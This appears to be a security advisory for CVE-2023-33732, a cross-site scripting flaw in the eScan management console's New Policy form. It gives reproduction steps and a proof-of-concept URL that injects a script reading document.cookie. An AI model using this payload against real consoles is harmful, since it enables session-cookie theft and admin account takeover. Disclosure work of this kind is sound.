Description: Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval.
Vulnerable Product Version: 14.0.1400.2281
Date: 30/05/2023
CVE: CVE-2023-33732
CVE Author: Sahil Ojha
Vendor Homepage: https://www.escanav.com
Software Link: https://cl.escanav.com/ewconsole.dll
Tested on: Windows
Steps to reproduce:
- Login into the eScan Management Console with a valid user credential.
- Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/AssignPolicyTemplate?type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&edit=0&txtPolicyType=&txtPolicyPath=!!!!%24%5CPolicies&Deletefileval=Roaming%20Users_Policy2&defaultpolicy=1
- After browsing the above mentioned URL, a XSS alert popped up with user session cookie as shown in figure below. Other vulnerable paramater's in the above URL are Type, txtPolicyPath, Deletefileval.
- By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.
